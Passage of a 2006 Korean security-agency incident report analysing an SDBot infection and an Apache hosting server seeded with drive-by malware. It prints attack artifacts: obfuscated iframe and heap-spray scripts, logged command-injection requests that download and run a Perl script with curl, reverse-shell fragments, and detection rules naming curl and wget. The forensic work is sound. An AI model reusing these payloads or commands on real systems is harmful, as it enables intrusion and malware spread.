50 2. 결론 2006년상반기 MS 보안업데이트및취약점현황을분석한결과, 원격코드실행으로악용될수있는긴급한취약점들에대해서우선적으로보안업데이트가이루어졌다. 특히 MS Office 취약점과 IE 취약점에대한비중이높아짐에따라클라이언트 PC의보안업데이트의필요성이강조된다 에공개된 Excel 원격코드실행취약점의경우에는이를악용한트로이잔이발견되었다 현재아직해당취약점에대한보안업데이트는발표되지않았으므로보안업데이트가배포될때까지백신, 방화벽등부가적인보안장비를활용하고, 의심스러운메일을삭제하고신뢰할수있는웹사이트만방문하는정보보호실천수칙준수가필요하다. [ 참고문헌 ] [1] [2] William A. Arbaugh, William L. Fithen, Jobn Mc Hugh, "Windows of Vulnerability : A Case Study Analysis", IEEE computer, 2000 [3] [4] [ 관련취약점분석문서 ] [1] 분석대응팀, MS 월별정기보안업데이트요약,
51 악성 Bot 감염 PC 사례분석 1. 개요 2006년 6월17일 ~6월28일동안악성 Bot이감염에사용하는포트들에대한공격트래픽이허니넷에서대량으로감지되었다. 이에따라허니넷을공격하는공격자 IP 목록을확보하여분석을수행하였다. 분석한공격자 IP 들에는모두악성Bot이설치되어있음을확인하였고, 그중하나의 IP에서는 1,700여개의네트워크세션을연결하여감염을시도하는트래픽을확인할수있었다. 이 IP는열려있는세션만 5,700개가넘어 PC에서인터넷사용이원활하지않을정도여서문제가되는악성Bot 프로그램을수집하여추가적인분석을수행하였다. 2. 피해시스템및악성 Botnet 명령 / 제어서버정보 o 용도 : 사무용 PC(Pentium 4 1.7GHz, 512MB RAM) o 운영체제 : Windows 2000 Professional o 악성 Bot 감염피시 : 국내모개발업체 3. 사고당시주요증상 o 악성 Bot 감염되어 5,700여개의포트를 Open o 1,700개세션을연결하여 135, 1025 포트를스캔하여감염시도 o 악성 Bot에서다수의포트를 Open함에따라감염 PC에서인터넷이정상적으로수행되지않음 4. 악성 Bot 감염시스템피해분석 1) 1 차감염상태 o KISA 운영허니넷에유입되는트래픽중 TCP/139, TCP/80 공격 IP 갯수가 6월17일부터증가하였다 /14 6/17 6/20 6/23 6/26 6/
52 o 이에따라원인파악을위해 TCP/139, 80 포트를공격하는 IP를직접방문하여사고조사를실시하였고조사 IP중하나인모개발사의사무용 PC에서악성 Bot 감염을확인하고, 이에대한분석을실시하였다. o 감염된 PC에서는 1개의 Bot에서 5,759개의세션을 Open 하고있었고, 그중 1,773개의세션은 TCP 135, 1025 포트스캔을통한감염시도를하고있는상태였다. o 사고조사전부터감염된 PC의사용자는속도가느려졌다는이야기를하였고실제로인터넷익스플로어등을이용한인터넷사용을하기어려운정도였다. o 포트를사용중인프로그램을검색한결과 c:\winnt\system32\scchost.exe" 파일로확인되었다. 일반적인 Bot 과마찬가지로윈도우즈레지스트리에등록되어시스템부팅시에자동으로실행되고있었다
53 o 감염자 PC에는국내한백신업체의백신프로그램이설치되어있었으나탐지를하지못하고있었고, 다른백신프로그램으로탐지한결과악성Bot의일종인 "SDBot.58DFF6C4" 로탐지되었다. o scchost.exe" 가대량의세션을맺고스캔을하고있어네트워크사용량뿐만아니라 CPU 사용량도 16% 정도사용하고있었다 o 수집한 scchost.exe" 의분석결과는아래표와같다. scchost.exe" 는또한 VMWARE 환경에서 는실행되지않고, 네트워크패킷캡춰도구인 Ethereal 이실행중일경우 Ethereal을강제종료 하는등분석작업을어렵게하도록되어있었다. 파일명 크기 MD5SUM 비고 scchost.exe 94,092 5a156a5ae82ea4d9cb54b7bff6f1b0da 2) 2차추가감염 o scchost.exe" 는 IRC 채널에접속하여별도의파일을다운로드받는역할과, 주변 IP 대역을스캔하여자신을전파하는기능을가지고있다. - 접속하는악성Bot 명령 / 제어서버 : sexy.xxx.com(83.xxx.xxx.134), TCP/1863 포트 - 악성Bot 명령 / 제어서버접속패스워드 : sexy - USERNAME : P4-zxtvlt ("zxtvlt" 부분은임의로변경됨 ) - NICKNAME : P4-zxtvlt (USERNAME 과동일 ) - 접속 Bot 채널명 : #p4 - Bot 채널접속패스워드 : haha o 아래화면은 Ethereal이아닌다른프로그램으로네트워크패킷을캡춰한화면으로, 악성 Bot 이접속하고자하는 IRC 서버와채널명, Username, Nickname 등을확인할수있다. o 실험환경에서 scchost.exe" 이접속하는 IRC 채널에접속하여채널내의통신을모니터링해본결과, 아래화면과같이 를다운받아실행하도록되어있음을알수있었다
54 o IRC 채널의제목 (Topic) 은해커의명령어전파로사용되고있었으며,.scan.startall" 로 Bot이각종취약점을이용하여전파하는부분과, navy.exe 파일을다운로드하는두가지명령으로구성되어있었다. Bot을제어하는해커는이제목 (Topic) 을바꾸어서원하는형태의공격을수행하거나파일을다운로드할수있다. 실제로 KISA 내부분석환경에서는공격을재현하였을때에는실제조사하였던사이트와는달리 TCP/135, 1025, 445, 6129, 139 트래픽이관찰되었다. o 다운로드된 navy.exe" 다운로드후곧바로실행되며, promo.xxx.com" 등에서각종애드웨어와스파이웨어를다운로드한다
55 o 다운로드된파일들은백신프로그램에서대부분트로이잔다운로더로탐지된다. 3) 3차감염서버접속 o 애드웨어 / 스파이웨어를다운로드한후에는또다른서버인 command.xxx.com" 에접속하여광고창사이트정보를다운받아해당광고사이트의광고를 Popup 형태로보여준다. 보여주는 Popup 광고창들의예는다음과같다. o 이후주기적으로광고사이트에접속하여광고창을띄우는등악성행위가관찰된다
56 5. 결론및보안대책 o 최초전파시에사용되었던악성 Bot인 scchost.exe" 파일은윈도우즈취약점을스캔하여전파를시도하였다. 전파에사용되었던포트는 TCP/135, 139, 1025, 445, 6129 로취약점내용은다음과같다. 이는대부분윈도우즈보안업데이트등으로예방이가능하므로최신보안업데이트의적용이반드시필요하다. 특히이번악성 Bot의경우국내일부백신에서탐지가되지않았었기때문에백신만을믿고보안업데이트를소홀히할경우감염의우려가있다. 포트 관련취약점및웜 / 악성 Bot 135 RPC DCOM 취약점 (MS03-026, MS03-039), Polybot, Spybot 등 139 NetBIOS Brute force login attempts 445 LSASS(MS03-026, 039, 049 등 ) 취약점, Agobot, Polybot, Spybot, Zotob, IRCBot, SDBot 등 901 NetDevil 취약점이용 Bot 6129 Dameware, Mockbot 등 1025 DCOM (MS03-026) 취약점이용 Bot o 이번사례에서는감염시네트워크트래픽을많이사용하는관계로컴퓨터사용속도가느려지고인터넷연결이잘되지않는등의증상이있었다. 일반사용자의경우이런경우가발생하면백신프로그램을사용하여치료하거나직접치료가어려울경우보호나라홈페이지 ( 를통해원격지원을받을수도있다. o 악성 Bot 파일인 scchost.exe" 는일반적으로분석환경에많이이용되는 VMWARE에서실행되지않을뿐아니라분석도구중하나인 Ethereal 프로그램을강제종료시키는등분석을방해하는행위를하고있어주의가필요하였다. 또한애드웨어가다수설치되어점차돈벌이를목적으로감염되는 Bot의특성을다시한번확인할수있었다
57 아파치웹서버에서악성코드유포사례 1. 개요 한국정보보호진흥원인터넷침해사고대응지원센터는자체개발한악성코드은닉사이트탐지프로그램 (MCFinder, Malicious Code Finder) 을활용하여홈페이지해킹후악성코드가삽입되어홈페이지방문자들을감염시킬수있는사이트를탐지하여조치하고있다. 2006년 1월 ~5월까지약 2천여개의악성코드유포지및경유지사이트들을발견하여조치하였는데, 이가운데 70여개의웹서버는 Apache 웹서버였다. MCFinder를통해악성코드가유포되고있는 H 기업의 Apache 웹서버를분석하였다. 분석결과해당시스템은미국으로부터공격을받았으며, 테크노트의취약점이공격에악용되었다. 해당웹서버는 350여개의웹사이트가운영되는웹호스팅서버였는데, 이들의모든 index 파일 (5,000여개) 에악성코드가삽입되어있었다. 이는일반적인악성코드유포지또는경우지사이트들이 SQL Injection 취약점에의해공격받고, 초기화면또는플래쉬등특정한곳에만악성코드를숨겨둔것과는대조적인것으로, 국내공개게시판인테크노트의취약점을이용하여웹호스팅서버에서운영되고있는모든사이트의모든 index 파일에악성코드를숨겼다는점에서주목할필요가있다. 또한, 본사고에서국내외의많은서버들이악성코드다운로드등해킹과정에서이용되고있었는데, 국내의방치된휴면홈페이지도해킹당한후 Reverse Connection을위한용도로사용되었다. 정보통신부와한국정보보호진흥원에서지난 6월휴면홈페이지정리캠페인을실시하였는데, 본사건을통해휴면홈페이지의위험성을느낄수있었다
58 2. 악성코드유포웹사이트분석 홈페이지초기화면에악성코드삽입 MCFinder 는국내 H 기업의홈페이지에서다음과같은악성코드를탐지하였다. 악성코드는탐지를어렵게하기위해인코딩되어있는상태였으며, 이를디코딩하면다음과같이 IFRAME 태그를이용하여특정사이트로연결을시키고있었다. <script language=javascript>document.write(unescape('<iframe SRC=" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></iframe><iframe SRC=" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></iframe>'))</script> IFRAME에서링크하고있는두개의사이트중 xxx.info는노르웨이에할당된 IP 주소였으며, 나머지한개의사이트 (xxxproxies.com) 은분석당시 IP로 resolution이되지않았다. 350 개웹사이트 5,000 여개웹페이지에악성코드삽입 해당피해웹사이트의분석을위해웹호스팅서버분석을진행하였는데, 피해웹사이트뿐만아니라해당서버내에있는 350개웹사이트의모든 index 파일이악성코드에감염되어있었다
59 conf]# grep "<VirtualHost" httpd.conf grep -v "#" wc -l 350 home]# grep "write(unescape('%3c%49%" -R. wc -l 5,164 또한, 다음과같이인터넷익스플로러의버퍼오버플로우취약점을공격하는것으로추정되는 4digit으로 encoding된자바스크립트코드도다수의웹페이지에삽입되어있었다. <SCRIPT language="javascript"> shellcode = unescape("%u4343%u4343"+"%u0eeb%u4b5b%uc933%uf7b1%u3480%uee0b%ufae2%u05eb%uede < 중간생략 > 6%uc182%u9c9a%u8bc0%u8b96%u00ee"); bigblock = unescape("%u0d0d%u0d0d"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; < 중간생략 > memory = new Array(); for (i=0;i<750;i++) memory[i] = block + shellcode; </SCRIPT> 악성코드삽입된웹페이지방문시악성 Bot 감염 일반인터넷사용자가자바스크립트코드가삽입된웹페이지에방문하였을경우다음과같이 C:\WinNT\system32 폴더아래에 a.exe라는파일이생성된다. 또한, 레지스트리에다음과같이몇개의레지스트리키에 msgfix.exe라는값을넣어시스템부팅후에도재가동될수있도록하고있다
60 a.exe 프로그램은프랑스에할당된 IP 주소인 xxx.xxx 에 6667 포트로연결되는것을볼수있었다. a.exe 프로그램은바이러스백신에서백도어기능을가진 SDBot 의변종으로진단하고있다. 즉, 홈페이지에삽입된악성코드는홈페이지방문자들을 IE 취약점을이용하여공격한후, 특정악성 Bot C&C( 명령 제어서버 ) 로연결되게하여원격제어한다. 웹로그분석결과 피해서버의웹로그분석결과 6월 17일과 28일양일에걸쳐미국에할당된 IP로부터테크노트취약점에대한공격이성공한것을발견할수있었다. 공격개요는다음과같다. o 공격시점 : 일, 28일 o 공격 IP : xxx.xxx ( 미국 O 대학 ), xxx.xxx.103.4( 미국 R 대학 ) o 공격방법 : 테크노트 CGI 프로그램의파라미터입력값검증오류악용 - 테크노트의 CGI 프로그램이파라미터입력값에대한검증을하지않아, 파이프 ( ) 문자이후에나오는쉘명령을실행하는취약점을악용하였음 o 특이사항 : curl 명령을사용한해킹프로그램설치 - 홈페이지변조등일반적으로리눅스서버의해킹시해킹프로그램을설치하기위해 wget 명령을흔히사용하고있으나, 이사건의경우 curl 명령을사용하였음 - curl 명령을이용하여 /tmp 디렉토리에 cub 라는 Perl 스크립트파일을생성하고이를실행하였음 curl 명령은 HTTP, HTTPS, FTP 등의프로토콜을이용하여원격지서버와파일을송수신할수있는명령어 access_log.1:xxx.xxx [28/Jun/2006:22:37: ] "GET /cgi-bin/technote/main.cgi?down_num= &board=int_board&command=down_loa d&filename=index.htm cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl %20xxx.jino-net.ru%20-o%20cbd;perl%20cbd%20xxx.xxx HTTP/1.1" access_log.2:xxx.xxx [17/Jun/2006:11:28: ] "GET /cgi-bin/technote/main.cgi?down_num= &board=int_board&command=down_loa d&filename=index.htm cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl %20xxx.jino-net.ru%20-o%20cbd;perl%20cbd%20xxx.xxx HTTP/1.1"
61 /tmp 디렉토리에설치된해킹프로그램 일반적으로공격자들이해킹프로그램설치디렉토리로가장선호하는 /tmp 에역시해킹관련프로그램들이설치되어있었다. tmp]# ls - alc -rwxr-xr-x 1 nobody nobody Jun 28 22:37 brk2 -rw-rw-rw- 1 nobody nobody 546 Jun 28 22:32 cbd cbd 스크립트는특정사이트로 Reverse Connection 을맺기위한 Perl 스크립트로보여진다. [root@linux tmp]# cat cbd #!/usr/bin/perl $ARGC=@ARGV; $shell = '/bin/sh'; print "\n-+++++cbd by doberman+++++-\n"; < 중간생략 > connect(socket, sockaddr_in($argv[1] '3333', inet_aton($argv[0] 'xxx.xxx '))) or die print "\nunable connect to host bad port?\n"; < 중간생략 > system("pwd;id;uname -a;cat /etc/*release;cat /proc/version"); system($shell); 해킹피해서버는원격에서의불법 telnet 접속을차단하기위해방화벽을이용하여특정 IP에서만접속할수있도록설정하고있었는데, 공격자는이를우회하기위해 Reverse Connection을하였다. cbd 스크립트의내용중 xxx.xxx 는국내 B기업이아직정식오픈하지않은상태로방치하고있었던휴면홈페이지였다. 해당서버는리눅스아파치웹서버로다수의포트가열려져있어보안이취약한상태였고, 이미해킹을당한것으로보여진다. 다음화면은 B기업의홈페이지이다
62 해당서버에는 22번포트와 3332포트에서각각 SSH 서비스를하고있었는데, 3332 포트가백도어용으로사용되고있는것으로보여진다. 앞서 E 웹호스팅서버에서발견된 Perl 스크립트에서는 3333번포트로접속을하도록되어있었는데, 공격자가주기적으로포트를변경하고있는것으로생각된다. 22 SSH Remote Login Protocol SSH-1.99-OpenSSH_3.1p SSH 피해웹호스팅서버의휘발성정보분석시네트워크연결상태에 B 기업의 3333번포트로 Reverse Connection한흔적이남아있었다. [root@linux root]# netstat -nap Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 8 0 xxx.xxx.20.63:45672 xxx.xxx :3333 CLOSE_WAIT 26587/ 피해웹호스팅서버의 /tmp 디렉토리에서발견된또다른해킹프로그램 (brk2) 는바이너리파일로리눅스커널의보안취약점을이용하여 root 권한을획득하기위한프로그램으로보여진다. [root@linux tmp]# strings brk2 < 중간생략 > [-] %s: %s [-] Unable to exit, entering neverending loop. Kernel seems not to be vulnerable double allocation Unable to determine kernel address Unable to set up LDT Unable to change page protection Invalid LDT entry Unable to jump to call gate /bin/sh Unable to spawn shell PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to allocate memory Unable to unmap stack < 이하생략 > 피해서버는리눅스커널버전이 이었다. [root@linux root]# uname -a Linux xxx.co.kr #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux 리눅스커널버전 버전에는일반사용자가 root 권한을획득할수있는취약점등다양한취약점이존재한다
63 결과적으로테크노트의취약점을이용하여웹서버권한 (nobody) 으로 cbd 백도어로 Reverse Connection을맺은후, brk2 해킹프로그램으로 root 권한을획득한후, 모든홈페이지에악성코드를삽입한것으로추측된다. 3. 결론및대책 본사고는기존사고와는다른몇가지특징을띄고있으며, 다음과같은시사점을주고있다. 첫째, 공개게시판취약점을이용하여악성코드를유포하였다. 기존의 SQL Injection 뿐만아니라공개게시판인테크노트의보안취약점도악성코드유포에이용되었다. 이는국내에서가장많이사용되고있는제로보드의취약점을이용한악성코드유포도있을수있음을시사한다. 둘째, 웹호스팅서비스를받고있는중소규모웹사이트를악성코드유포에이용하였다. 기존은일반사용자들의방문이많은뉴스사이트등주로대규모웹사이트들이공격대상이되었으나, 웹호스팅서비스를받는중소규모웹사이트수백개에악성코드를삽입하였다. 또한, 웹호스팅업체들의아파치웹서버는홈페이지변조가가장대표적인피해였지만, 보다범죄적인악성코드유포에도아파치웹서버들이악용되고있음에주목할필요가있다. 셋째, 국내휴면홈페이지가해킹의숙주역할을하고있었다. 웹사이트오픈을준비하기위해방치되었던 B기업의홈페이지가 Reverse Connection을위한용도로사용되었는데, 방치된휴면홈페이지가해킹에사용된사례라고할수있다. 지난 6월인터넷침해사고대응지원센터에서실시한휴면홈페이지실태조사에서해킹당한홈페이지가전체홈페이지에
64 비해 2배정도많이휴면상태였다 ( 전체홈페이지중휴면홈페이지비율은 14.5% 였으며, 해킹당한홈페이지중휴면홈페이지비율은 30% 정도였음 ). 즉, 실태조사를통해휴면홈페이지는해킹당할가능성도높음을알수있었으며, 이번사고에서도휴면홈페이지가해킹에악용되고있었다. 본사건에대한보안대책은다음과같다. 첫째, 테크노트에대한최신보안패치를적용한다. 테크노트홈페이지 ( 에서 2006년 2월 22일배포한 테크노트 PHP6 정식버전을설치한다. 둘째, 최신리눅스커널로패치한다. 최근리눅스커널의취약점으로인해로컬사용자가 root 권한을획득할수있는취약점들이다수존재한다. 따라서 로부터최신의리눅스커널을다운로드받아설치하도록한다. 셋째, Apache용공개웹방화벽 ModSecurity를이용하여보안을강화한다. 아래기술문서를참조하여 ModSecurity를설치하고운영한다. 보안정보 기술문서 ModSecurity를이용한아파치웹서버보안 금번사고와같이 URL 파라메터입력값에 curl 명령등을사용한공격을차단하기위해서다음과같은룰을 ModSecurity에적용할수있다. SecFilterSelective HTTP_User-Agent "(libwhisker paros wget libwww perl curl java)" SecFilterSelective ARGS "<script" SecFilterSelective ARGS "javascript:" SecFilterSelective ARGS_VALUES ";[[:space:]]*(ls id pwd wget curl)" SecFilterSelective ARGS_VALUES "^ 넷째, 일반사용자의경우반드시최신보안패치를유지한다. 본사고에서도일반사용자들의 PC가보안패치되어있지않을경우홈페이지방문만으로악성 Bot에감염될수있다. 따라서, OS 및 IE에대한보안패치를주기적으로하고, 가능한 자동보안업데이트 기능을설정해놓도록하여야한다
21 8 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 33 36 37 2 218 Bot 1,45 1,69 12.7% 1,644 1,3 26.5% 666 556 19.8% 25 66 24.2% 423 44 4.7% 323
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More information*****
Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot
More informationÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù
21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132
More information*
Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46
More informationÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó
Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%
More informationìœ€íŁ´IP( _0219).xlsx
차단 IP 국적 공격유형 목적지포트 IPS 룰 180.97.215.45 중국 서비스취약점공격 TCP/5555 (0001)SYN Port Scan 222.186.42.248 중국 서비스취약점공격 TCP/80 (0001)SYN Port Scan 104.236.178.166 미국 웹해킹 TCP/80 (5010)HEAD / HTTP (Http server buffer
More information인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8
차단 IP 국적 공격유형 목적지포트 IPS 룰 222.119.190.175 한국 서비스취약점공격 TCP/110 #14713(POP3 Login Brute Force Attempt-2/3(count 30 seconds 10)) 52.233.160.51 네덜란드 웹해킹 TCP/80 Apache Struts Jakarta Multipart Parser Remote
More information< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>
악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More information*2월완결
2 May 27 5 인터넷침해사고동향및분석월보 본보고서내정부승인통계는웜 바이러스피해신고건수, 해킹 ( 스팸릴레이, 피싱경유지, 단순침입시도, 기타해킹, 홈페이지변조건수 ) 에한하며, 침해사고동향분석에대한이해를돕기위하여기술된악성봇감염률, PC 생존시간, 허니넷통계등은해당되지않습니다. 본보고서내용의전부나일부를인용하는경우에는반드시출처 [ 자료 : 한국정보보호진흥원인터넷침해사고대응지원센터
More information<C0CCC8ADC1F82E687770>
분석보고서 09. 11. 06. 작성 악성봇분석과예방 (Analysis Malicious Bot & Protection) 작성자 : 영남대학교 @Xpert 이화진 ghkwls0308@ynu.ac.kr - 1 - - 목차 - 1. About 봇... 3 1) 봇의정의 2) 봇의특징 3) 봇의동작원리 2. 악성 IRC봇... 4 1) 정의 2) 동작원리 3) 증상
More information*2월완결
8 November 월간특집 MS8-67을이용하여전파되는악성코드분석 인터넷침해사고동향및분석월보 본보고서내용의전부나일부를인용하는경우에는반드시출처 [ 자료 : 한국정보보호진흥원인터넷침해사고대응지원센터 ] 를명시하여주시기바랍니다. Contents Part Part Part 3 월간동향요약침해사고통계분석 -. 증감추이 ( 전년, 전월대비 ) -. 침해사고통계요약 -3.
More information국가표본수기간 평균최초수익률 국가표본수기간 ( 단위 : 개, 년, %) 평균최초수익률 아르헨티나 20 1991-1994 4.4 요르단 53 1999-2008 149.0 오스트레일리아 1,562 1976-2011 21.8 한국 1,593 1980-2010 61.6 오스트리아 102 1971-2010 6.3 말레이시아 350 1980-2006 69.6 벨기에 114
More information*2월완결
34203 March 3 월간특집 도박게임 설치 프로그램을 악용한 악성코드 감염사례 분석 인터넷침해사고 동향및분석월보 본보고서내정부승인통계 ( 승인번호제 34203 호, 통계작성기관 : 한국정보보호진흥원 ) 는웜 바이러스피해신고, 해킹 ( 스팸릴레이, 피싱경유지, 단순침입시도, 기타해킹, 홈페이지변조 ) 에한하며, 침해사고동향분석에대한이해를돕기위하여기술된악성봇감염률,
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More informationuntitled
5월 인터넷 침해사고 동향 및 분석 월보 2006. 6 한국정보보호진흥원 해킹 바이러스 상담전화 (국번없이) 118 www.krcert.or.kr 본보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 [자료 : 한국정보보호진흥원(KISA)]을 명시하여 주시기 바랍니다. 컬러로 출력하거나 화면으로 보시면 도표를 구분하기 쉽습니다. 목 차 주요
More information` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10
월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부
월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information<31305FBEC6C0CCC5DB2E687770>
1. 개요분산서비스거부공격 (Distribute Denial of Service) 은공격의대상이되는서버에서비스장애를 발생시킬뿐만아니라, 네트워크의안정성에도위협이되고있으므로각별한주의가필요하다. 최근, 실제로국내인터넷사용 PC가분산서비스거부공격 (DDoS) 을위한 Agent 로악용되어대량의트래픽을발생하여, 국내일부게임아이템거래사이트에서비스장애를유발시킨사고가발생하였다.
More information개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-
개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
